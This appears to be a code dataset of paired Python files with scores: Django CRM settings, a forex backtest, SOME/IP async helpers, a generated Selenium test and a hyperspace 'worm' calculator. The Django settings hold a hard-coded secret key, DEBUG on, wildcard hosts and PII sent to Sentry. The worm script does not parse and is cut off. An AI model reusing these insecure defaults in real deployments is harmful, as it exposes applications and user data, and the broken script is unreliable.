# Error reporting: Sentry is initialised at import time of this module.
sentry_sdk.init(
    dsn=os.environ.get('SENTRY'),
    integrations=[DjangoIntegration()],
    # Set traces_sample_rate to 1.0 to capture 100%
    # of transactions for performance monitoring.
    # We recommend adjusting this value in production.
    traces_sample_rate=1.0,
    # If you wish to associate users to errors (assuming you are using
    # django.contrib.auth) you may enable sending PII data.
    send_default_pii=True
)

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# Read the key from the environment when available; the hard-coded value is
# retained only as a development fallback so existing setups keep working.
SECRET_KEY = os.environ.get(
    'SECRET_KEY',
    'django-insecure-&%*y&g^emd56xe_ul5c2u0$8_v%i@g57p5kglmk9#3n2t98p*k',
)

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = ['*']

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'Vendor.apps.VendorConfig',
    'crispy_forms',
    'django_filters',
    'cloudinary',
]

CRISPY_TEMPLATE_PACK = 'bootstrap4'

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    # WhiteNoise must sit directly below SecurityMiddleware to serve static
    # files correctly (per the WhiteNoise Django integration docs); it was
    # previously placed at the end of this list.
    'whitenoise.middleware.WhiteNoiseMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'UltronCRM.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [BASE_DIR / "templates"],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'UltronCRM.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# SQLite is the development default; when a DATABASE_URL environment variable
# is set, dj_database_url overrides it below (e.g. Postgres in production).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
db_from_env = dj_database_url.config(conn_max_age=600)
DATABASES['default'].update(db_from_env)

# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)

# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'

AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']

# cloudinary config — credentials come from the environment (.env).
cloudinary.config(
    cloud_name = os.environ.get('CLOUD'),
    api_key = os.environ.get('API_KEY'),
    api_secret = os.environ.get('SECRET')
)

# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# EMAIL_FILE_PATH = str(BASE_DIR.joinpath('sent_emails'))
# EMAIL_HOST = 'smtp.gmail.com'
# EMAIL_USE_TLS = True
# EMAIL_PORT = 587
# EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
# EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD') | UltronCRM/settings.py | from pathlib import Path
import cloudinary
import cloudinary.uploader
import cloudinary.api
from dotenv import load_dotenv
import dj_database_url
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
import os
load_dotenv()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
sentry_sdk.init(
dsn=os.environ.get('SENTRY'),
integrations=[DjangoIntegration()],
# Set traces_sample_rate to 1.0 to capture 100%
# of transactions for performance monitoring.
# We recommend adjusting this value in production.
traces_sample_rate=1.0,
# If you wish to associate users to errors (assuming you are using
# django.contrib.auth) you may enable sending PII data.
send_default_pii=True
)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-&%*y&g^emd56xe_ul5c2u0$8_v%i@g57p5kglmk9#3n2t98p*k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Vendor.apps.VendorConfig',
'crispy_forms',
'django_filters',
'cloudinary',
]
CRISPY_TEMPLATE_PACK = 'bootstrap4'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'UltronCRM.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR /"templates"],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'UltronCRM.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
db_from_env = dj_database_url.config(conn_max_age=600)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Default primary key field type
# https:/
# /docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
# cloudinary config
cloudinary.config(
cloud_name = os.environ.get('CLOUD'),
api_key = os.environ.get('API_KEY'),
api_secret = os.environ.get('SECRET')
)
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# EMAIL_FILE_PATH = str(BASE_DIR.joinpath('sent_emails'))
# EMAIL_HOST = 'smtp.gmail.com'
# EMAIL_USE_TLS = True
# EMAIL_PORT = 587
# EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
# EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD') | 0.470737 | 0.062847 |
import os
import sys
sys.path.append(os.getcwd())
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from src.DataReader import *
from src.Visualiser import *
from src.Trader import *
from test.MCS import *

# Load one instrument's minute-bar price history; alternative datasets are
# kept commented out for quick switching.
reader = DataReader("./resources/DAT_XLSX_USDZAR_M1_2019.csv")
# reader = DataReader("./resources/SPY.csv")
# reader = DataReader("./resources/gemini_BTCUSD_1hr.csv")

indicators = pd.DataFrame()

# Trading signal: 10/30 moving-average crossover on the close price.
# Other indicators kept for reference.
mac = MovingAverageCrossover(reader.data["Close"], 10, 30)
# bbs = BollingerBand(reader.data["Close"], 90, 1)
# rsi = RelativeStrengthIndex(reader.data["Close"], 20)
# mom = Momentum(reader.data["Close"], 150)

idtf = IntradayTimeFilter("00:00", "00:00")

# Risk parameters, expressed in percent (fraction * 100).
slp = 0.3 * 100   # stop loss
tlp = 0.8 * 100   # trailing loss
tpp = 1.5 * 100   # take profit

print("** Starting Trader ***")
trader = Trader(reader.data, starting_capital=1000, trading_mechanism=mac, intraday_time_filter=idtf,
                stop_loss_percent=slp, trailing_loss_percent=tlp, take_profit_percent=tpp)

# Output directory is keyed on the strategy/risk parameters of this run.
output_title = f"../nmrqltrading_results/results/{trader.trading_mechanism.fast_length}_{trader.trading_mechanism.slow_length}_{trader.stop_loss_percent}_{trader.trailing_loss_percent}_{trader.take_profit_percent}"
os.makedirs(output_title, exist_ok=True)

print("** Processing trades **")
tr = process_trade_results(trader)
# Context manager guarantees the report is flushed and closed even on error
# (replaces the manual open/flush/close sequence).
with open(f"{output_title}/trade_results.txt", 'w') as results_file:
    results_file.write(tr)

print("** Running MCS **")
mcs = MCS(trader, 3)


def _save_figure(filename):
    """Persist the current matplotlib figure under the run's output dir and close it."""
    plt.savefig(f"{output_title}/{filename}")
    plt.close()


print("** Plotting Trades Made **")
plot_made_trades(trader)
_save_figure("made_trades.png")
print("** Plotting Equity Curve **")
plot_equity(trader)
_save_figure("equity_curve.png")
print("** Plotting Drawdown Curve **")
plot_drawdown(trader)
_save_figure("drawdown_curve.png")
print("** Plotting MCS **")
plot_monte_carlo(mcs)
_save_figure("mcs.png")
print("** Plotting MAE **")
plot_mae(trader)
_save_figure("mae.png")
print("** Plotting MFE **")
plot_mfe(trader)
_save_figure("mfe.png")
print("** Plots completed **") | main.py | import os
import sys
sys.path.append(os.getcwd())
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from src.DataReader import *
from src.Visualiser import *
from src.Trader import *
from test.MCS import *
reader = DataReader("./resources/DAT_XLSX_USDZAR_M1_2019.csv")
# reader = DataReader("./resources/SPY.csv")
# reader = DataReader("./resources/gemini_BTCUSD_1hr.csv")
indicators = pd.DataFrame()
mac = MovingAverageCrossover(reader.data["Close"], 10, 30)
# bbs = BollingerBand(reader.data["Close"], 90, 1)
# rsi = RelativeStrengthIndex(reader.data["Close"], 20)
# mom = Momentum(reader.data["Close"], 150)
idtf = IntradayTimeFilter("00:00", "00:00")
slp = 0.3*100
tlp = 0.8*100
tpp = 1.5*100
print("** Starting Trader ***")
trader = Trader(reader.data, starting_capital=1000, trading_mechanism=mac, intraday_time_filter=idtf,
stop_loss_percent=slp, trailing_loss_percent=tlp, take_profit_percent=tpp)
output_title = f"../nmrqltrading_results/results/{trader.trading_mechanism.fast_length}_{trader.trading_mechanism.slow_length}_{trader.stop_loss_percent}_{trader.trailing_loss_percent}_{trader.take_profit_percent}"
os.makedirs(output_title, exist_ok=True)
print("** Processing trades **")
tr = process_trade_results(trader)
f = open(f"{output_title}/trade_results.txt", 'w')
f.write(tr)
f.flush()
f.close()
print("** Running MCS **")
mcs = MCS(trader, 3)
print("** Plotting Trades Made **")
plot_made_trades(trader)
plt.savefig(f"{output_title}/made_trades.png")
plt.close()
print("** Plotting Equity Curve **")
plot_equity(trader)
plt.savefig(f"{output_title}/equity_curve.png")
plt.close()
print("** Plotting Drawdown Curve **")
plot_drawdown(trader)
plt.savefig(f"{output_title}/drawdown_curve.png")
plt.close()
print("** Plotting MCS **")
plot_monte_carlo(mcs)
plt.savefig(f"{output_title}/mcs.png")
plt.close()
print("** Plotting MAE **")
plot_mae(trader)
plt.savefig(f"{output_title}/mae.png")
plt.close()
print("** Plotting MFE **")
plot_mfe(trader)
plt.savefig(f"{output_title}/mfe.png")
plt.close()
print("** Plots completed **") | 0.476336 | 0.201813 |
from __future__ import annotations
import asyncio
import functools
import socket
import typing
def log_exceptions(msg="unhandled exception in {__func__}"):
    """
    Decorator that catches every exception raised by a method (plain or
    coroutine) and logs it through ``self.log``.

    ``msg`` is formatted with ``__func__`` bound to the wrapped function's
    ``__qualname__``, plus the positional/keyword arguments of the call.
    On exception the wrapper logs the traceback and returns ``None``.
    """

    def decorator(func):
        def _report(self, args, kwargs):
            # Log with full traceback via the owning object's logger.
            self.log.exception(
                msg.format(__func__=func.__qualname__, *args, **kwargs)
            )

        if asyncio.iscoroutinefunction(func):

            @functools.wraps(func)
            async def wrapper(self, *args, **kwargs):
                try:
                    return await func(self, *args, **kwargs)
                except Exception:
                    _report(self, args, kwargs)

        else:

            @functools.wraps(func)
            def wrapper(self, *args, **kwargs):
                try:
                    return func(self, *args, **kwargs)
                except Exception:
                    _report(self, args, kwargs)

        return wrapper

    return decorator
async def getfirstaddrinfo(
    host, port, family=0, type=0, proto=0, sock=None, flags=0, loop=None
):
    """
    Resolve *host*/*port* and return the first address-info tuple.

    Parameters mirror :func:`socket.getaddrinfo`. If *sock* is given, its
    family/type/proto are used instead and must not also be passed
    explicitly. *loop* may override the event loop used for resolution; by
    default the currently running loop is used.

    Raises:
        ValueError: if *sock* is combined with family/type/proto.
        socket.gaierror: if resolution returned no results.
    """
    if sock is not None:
        if family != 0 or type != 0 or proto != 0:
            raise ValueError(
                "family/type/proto and sock cannot be specified at the same time"
            )
        family = sock.family
        type = sock.type
        proto = sock.proto
    if loop is None:  # pragma: nobranch
        # asyncio.get_event_loop() is deprecated inside coroutines; this
        # function is always awaited, so the running loop is the right one.
        loop = asyncio.get_running_loop()
    result = await loop.getaddrinfo(
        host, port, family=family, type=type, proto=proto, flags=flags
    )
    if not result:  # pragma: nocover
        raise socket.gaierror(
            socket.EAI_NODATA, f"no address info found for {host}:{port}"
        )
    return result[0]
T = typing.TypeVar("T")
async def wait_cancelled(task: asyncio.Task[T]) -> typing.Optional[T]:
# I'd go with try: await task; except asyncio.CancelledError, but this can not
# discern between task raising cancelled or this current task being cancelled.
await asyncio.gather(task, return_exceptions=True)
assert task.done()
if task.cancelled():
return None
return task.result() | src/someip/utils.py | from __future__ import annotations
import asyncio
import functools
import socket
import typing
def log_exceptions(msg="unhandled exception in {__func__}"):
"""
decorator that will catch all exceptions in methods and coroutine methods
and log them with self.log
msg will be formatted with __func__ as the called function's __qualname__ plus any
passed arguments
"""
def decorator(f):
if asyncio.iscoroutinefunction(f):
@functools.wraps(f)
async def wrapper(self, *args, **kwargs):
try:
return await f(self, *args, **kwargs)
except Exception:
self.log.exception(
msg.format(__func__=f.__qualname__, *args, **kwargs)
)
else:
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception:
self.log.exception(
msg.format(__func__=f.__qualname__, *args, **kwargs)
)
return wrapper
return decorator
async def getfirstaddrinfo(
host, port, family=0, type=0, proto=0, sock=None, flags=0, loop=None
):
"""
retrieve sockaddr for host/port pair with given family, type, proto settings.
return first sockaddr. raises socket.gaierror if no result was returned.
"""
if sock is not None:
if family != 0 or type != 0 or proto != 0:
raise ValueError(
"family/type/proto and sock cannot be specified at the same time"
)
family = sock.family
type = sock.type
proto = sock.proto
if loop is None: # pragma: nobranch
loop = asyncio.get_event_loop()
result = await loop.getaddrinfo(
host, port, family=family, type=type, proto=proto, flags=flags
)
if not result: # pragma: nocover
raise socket.gaierror(
socket.EAI_NODATA, f"no address info found for {host}:{port}"
)
return result[0]
T = typing.TypeVar("T")
async def wait_cancelled(task: asyncio.Task[T]) -> typing.Optional[T]:
# I'd go with try: await task; except asyncio.CancelledError, but this can not
# discern between task raising cancelled or this current task being cancelled.
await asyncio.gather(task, return_exceptions=True)
assert task.done()
if task.cancelled():
return None
return task.result() | 0.639624 | 0.088505 |
import logging
import random
import string
import sys
import unittest
from time import time, sleep
import apiritif
import os
import re
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from bzt.resources.selenium_extras import FrameManager, WindowManager
def setup():
    # apiritif per-thread setup hook (generated fixture): create the remote
    # Selenium session and the helper objects every test method pulls back
    # out of the thread store in TestLocScRemote.setUp.
    # NOTE(review): the executor URL and capabilities are placeholder values
    # emitted by the Taurus generator — not a reachable grid.
    driver = webdriver.Remote(command_executor='http://user:key@remote_web_driver_host:port/wd/hub',
                              desired_capabilities={
        'app': '',
        'browserName': 'firefox',
        'deviceName': '',
        'javascriptEnabled': 'True',
        'platformName': 'linux',
        'platformVersion': '',
        'seleniumVersion': '',
        'version': '54.0',
    })
    # Implicit wait applies to every element lookup on this driver.
    driver.implicitly_wait(3.5)
    wnd_mng = WindowManager(driver)
    frm_mng = FrameManager(driver)
    vars = {
    }
    apiritif.put_into_thread_store(vars, driver, wnd_mng, frm_mng)
def teardown():
    # apiritif per-thread teardown hook: fetch the driver stored by setup()
    # and end the browser session.
    (_, driver, _, _) = apiritif.get_from_thread_store()
    driver.quit()
class TestLocScRemote(unittest.TestCase):
    def setUp(self):
        # Unpack the per-thread objects created by the module-level setup().
        (self.vars, self.driver, self.wnd_mng, self.frm_mng) = apiritif.get_from_thread_store()
    def test_1_(self):
        # Generated test case "/": open the BlazeDemo landing page, wait for
        # the submit button, then assert the title and that the body does NOT
        # contain 'contained_text'. FLOW_MARKER scripts bracket the case so
        # the reporting backend can attribute status per test case.
        try:
            self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
                'testCaseName': '/',
                'testSuiteName': 'loc_sc_remote',
            })
            with apiritif.transaction_logged('/'):
                self.driver.get('http://blazedemo.com/')
                WebDriverWait(self.driver, 3.5).until(econd.presence_of_element_located((By.XPATH, "//input[@type='submit']")), 'Element "//input[@type=\'submit\']" failed to appear within 3.5s')
                self.assertEqual(self.driver.title, 'BlazeDemo')
                body = self.driver.page_source
                re_pattern = re.compile('contained_text')
                # "not-contains" assertion: zero matches expected.
                self.assertEqual(0, len(re.findall(re_pattern, body)), "Assertion: 'contained_text' found in BODY")
        except AssertionError as exc:
            # Assertion failures are reported as 'failed'...
            self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
                'status': 'failed',
                'message': str(exc),
            })
            raise
        except BaseException as exc:
            # ...any other error (including KeyboardInterrupt) as 'broken'.
            self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
                'status': 'broken',
                'message': str(exc),
            })
            raise
        else:
            self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
                'status': 'success',
                'message': '',
            })
def test_2_empty(self):
try:
self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
'testCaseName': 'empty',
'testSuiteName': 'loc_sc_remote',
})
with apiritif.transaction_logged('empty'):
pass
except AssertionError as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'failed',
'message': str(exc),
})
raise
except BaseException as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'broken',
'message': str(exc),
})
raise
else:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'success',
'message': '',
}) | tests/resources/selenium/generated_from_requests_remote.py |
import logging
import random
import string
import sys
import unittest
from time import time, sleep
import apiritif
import os
import re
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from bzt.resources.selenium_extras import FrameManager, WindowManager
def setup():
driver = webdriver.Remote(command_executor='http://user:key@remote_web_driver_host:port/wd/hub',
desired_capabilities={
'app': '',
'browserName': 'firefox',
'deviceName': '',
'javascriptEnabled': 'True',
'platformName': 'linux',
'platformVersion': '',
'seleniumVersion': '',
'version': '54.0',
})
driver.implicitly_wait(3.5)
wnd_mng = WindowManager(driver)
frm_mng = FrameManager(driver)
vars = {
}
apiritif.put_into_thread_store(vars, driver, wnd_mng, frm_mng)
def teardown():
(_, driver, _, _) = apiritif.get_from_thread_store()
driver.quit()
class TestLocScRemote(unittest.TestCase):
def setUp(self):
(self.vars, self.driver, self.wnd_mng, self.frm_mng) = apiritif.get_from_thread_store()
def test_1_(self):
try:
self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
'testCaseName': '/',
'testSuiteName': 'loc_sc_remote',
})
with apiritif.transaction_logged('/'):
self.driver.get('http://blazedemo.com/')
WebDriverWait(self.driver, 3.5).until(econd.presence_of_element_located((By.XPATH, "//input[@type='submit']")), 'Element "//input[@type=\'submit\']" failed to appear within 3.5s')
self.assertEqual(self.driver.title, 'BlazeDemo')
body = self.driver.page_source
re_pattern = re.compile('contained_text')
self.assertEqual(0, len(re.findall(re_pattern, body)), "Assertion: 'contained_text' found in BODY")
except AssertionError as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'failed',
'message': str(exc),
})
raise
except BaseException as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'broken',
'message': str(exc),
})
raise
else:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'success',
'message': '',
})
def test_2_empty(self):
try:
self.driver.execute_script('/* FLOW_MARKER test-case-start */', {
'testCaseName': 'empty',
'testSuiteName': 'loc_sc_remote',
})
with apiritif.transaction_logged('empty'):
pass
except AssertionError as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'failed',
'message': str(exc),
})
raise
except BaseException as exc:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'broken',
'message': str(exc),
})
raise
else:
self.driver.execute_script('/* FLOW_MARKER test-case-stop */', {
'status': 'success',
'message': '',
}) | 0.170473 | 0.054853 |
# Number Of Worms, Length Of HP Each Worm Needs To Create, Length Of Each Worm and Diameter Of Each Worm
import math
# NOTE(review): several constants below have had their values removed
# ("NAME = # unit" is a SyntaxError). This file will not even parse, let
# alone run, until real values are filled in for MinLOHP, MaxLOHP, MinLOW,
# MinDOW, MaxDOW, TOH, DOCC and DOHP.
# Possible Constants Related To Worms
MinLOHP = # ly
# MinLOHP means Minimum Length Of Hyperspace Pathway.
MaxLOHP = # ly
# MaxLOHP means Maximum Length Of HP.
MSDBITOHP = 0.0001369863 # ly
# MSDBITOHP means Minimum Safe Distance Between Intermediate Terminals Of HPs. Note: 0.0001369863 ly is 0.5 days of travel at 0.1 c.
# It's 1 295 103 418.56 km.
MinLOW = # km
# MinLOW means Minimum Length Of Worm.
MinDOW = # km
# MinDOW means Minimum Diameter Of Worm.
MaxDOW = # km
# MaxDOW means Maximum Diameter Of Worm.
TOH = # km
# TOH means Thickness Of Hull.
DOCC = # km
# DOCC means Diameter Of Conduit Coil.
DOHP = # km
# DOHP means Diameter Of HP.
# Derived quantities (all depend on the redacted constants above).
HC = (TOH + DOCC) * 2
MMF = MaxDOW / MinDOW
# MMF means Maximum Multiplication Factor for diameter of worm.
MaxLOHPCWWOVD = ((MaxDOW + (HC * MMF - HC)) / MinDOW) ** 2 * MinLOHP
# MaxLOHPCWWOVD means Maximum Length Of HP Created With Worm Of Variable Diameter.
def user_input_handling_function_fifth():
    """Prompt until the user enters a valid number and return it as a float.

    Returns:
        float: the parsed value. Callers compare the result against numeric
        constants (e.g. ``LOHP < MinLOHP``), so the previous behavior of
        returning the raw input string raised TypeError on Python 3 — the
        conversion here is the fix.

    The accepted grammar is unchanged (digits plus at most one '.'), but the
    old loop's false positives — empty input, a lone '.', and strings with
    several dots such as '1.2.3' — are now rejected and re-prompted.
    """
    allowed = set('0123456789.')
    print()
    user_input = input('Enter: ')
    print()
    while True:
        valid = (
            bool(user_input)
            and set(user_input) <= allowed
            and user_input.count('.') <= 1
            and user_input != '.'
        )
        if valid:
            return float(user_input)
        print('The number must consist of digits. For example: 1, 12, 123.1 or 1234.1.')
        print()
        user_input = input('Re-enter: ')
        print()
print('The length of a HP is in Light Years (LY).')
print()
print('What is the length of the HP?')
print()
LOHP = user_input_handling_function_fifth()
# LOHP means Length Of HP.
# NOTE(review): the comparison below requires LOHP to be numeric; verify
# that user_input_handling_function_fifth returns a number, not the raw
# input string.
if LOHP < MinLOHP:
    # Pathway shorter than the minimum — no worms needed/possible.
    print('NOW:', 0)
    # NOW means Number Of Worms.
else:
    # One worm can create at most MaxLOHP of pathway; round the count up.
    NOW = LOHP / MaxLOHP
    if (NOW).is_integer() == True:
        # Each worm covers an equal share of the pathway, after reserving
        # the safety gap MSDBITOHP between consecutive intermediate terminals.
        LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
        # LOHPEWNTC means Length Of HP Each Worm Needs To Create.
        print('NOW:', NOW)
        print()
        print('LOHPEWNTC:', LOHPEWNTC, 'LY')
        print()
    else:
        NOW = math.ceil(NOW)
        LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
        print('NOW:', NOW)
        print()
        print('LOHPEWNTC:', LOHPEWNTC, 'LY')
        print()
    if LOHPEWNTC > MaxLOHPCWWOVD:
        # Beyond what a variable-diameter worm can produce: scale length
        # only and cap the diameter at the maximum.
        LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
        DOEW = MaxDOW
        print('LOEW:', LOEW, 'Km')
        print()
        print('DOEW:', DOEW, 'Km')
        print()
    else:
        # Within range: scale both length and diameter; the hull/coil
        # overhead HC does not scale with the worm, hence the correction.
        LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
        MF = math.sqrt(LOHPEWNTC / MinLOHP)
        ## MF means Multiplication Factor.
        DOEW = MinDOW * MF - (HC * MF - HC)
        print('LOEW:', LOEW, 'Km')
        print()
        print('DOEW:', DOEW, 'Km')
        print()
#FOc = 0.125 #<<----
# FOc means Fraction Of c. The sub-light velocity that the ship uses between intermediate terminals. 0.125 should be used to cut
# down some time while still having adequate sensor capability. Unhashtag to test.
#TTTHP = NOW * LOHPEWNTC / 64.0 + ((NOW - 1.0) * MSDBITOHP / FOc)
## TTTHP means Time To Travel HP. Unhashtag to test.
#print("TTTHP:", TTTHP, "years,", TTTHP * 12, "months,", TTTHP * 365, "days")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365, "days to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365 * 24, "hours to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test. | number_of_worms,_length_of_HP_each_worm_needs_to_create,_length_of_each_worm_and_diameter_of_each_worm.py |
# Number Of Worms, Length Of HP Each Worm Needs To Create, Length Of Each Worm and Diameter Of Each Worm
import math
# Possible Constants Related To Worms
MinLOHP = # ly
# MinLOHP means Minimum Length Of Hyperspace Pathway.
MaxLOHP = # ly
# MaxLOHP means Maximum Length Of HP.
MSDBITOHP = 0.0001369863 # ly
# MSDBITOHP means Minimum Safe Distance Between Intermediate Terminals Of HPs. Note: 0.0001369863 ly is 0.5 days of travel at 0.1 c.
# It's 1 295 103 418.56 km.
MinLOW = # km
# MinLOW means Minimum Length Of Worm.
MinDOW = # km
# MinDOW means Minimum Diameter Of Worm.
MaxDOW = # km
# MaxDOW means Maximum Diameter Of Worm.
TOH = # km
# TOH means Thickness Of Hull.
DOCC = # km
# DOCC means Diameter Of Conduit Coil.
DOHP = # km
# DOHP means Diameter Of HP.
HC = (TOH + DOCC) * 2
MMF = MaxDOW / MinDOW
# MMF means Maximum Multiplication Factor for diameter of worm.
MaxLOHPCWWOVD = ((MaxDOW + (HC * MMF - HC)) / MinDOW) ** 2 * MinLOHP
# MaxLOHPCWWOVD means Maximum Length Of HP Created With Worm Of Variable Diameter.
def user_input_handling_function_fifth():
print()
user_input = input('Enter: ')
print()
good_to_go = 'no'
errors = []
digits = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.']
while good_to_go == 'no':
for i in user_input:
if i not in digits:
print('The number must consist of digits. For example: 1, 12, 123.1 or 1234.1.')
errors.append('yes')
break
if 'yes' in errors:
print()
user_input = input('Re-enter: ')
print()
good_to_go = 'no'
errors = []
else:
good_to_go = 'yes'
return user_input
print('The length of a HP is in Light Years (LY).')
print()
print('What is the length of the HP?')
print()
LOHP = user_input_handling_function_fifth()
# LOHP means Length Of HP.
if LOHP < MinLOHP:
print('NOW:', 0)
# NOW means Number Of Worms.
else:
NOW = LOHP / MaxLOHP
if (NOW).is_integer() == True:
LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
# LOHPEWNTC means Length Of HP Each Worm Needs To Create.
print('NOW:', NOW)
print()
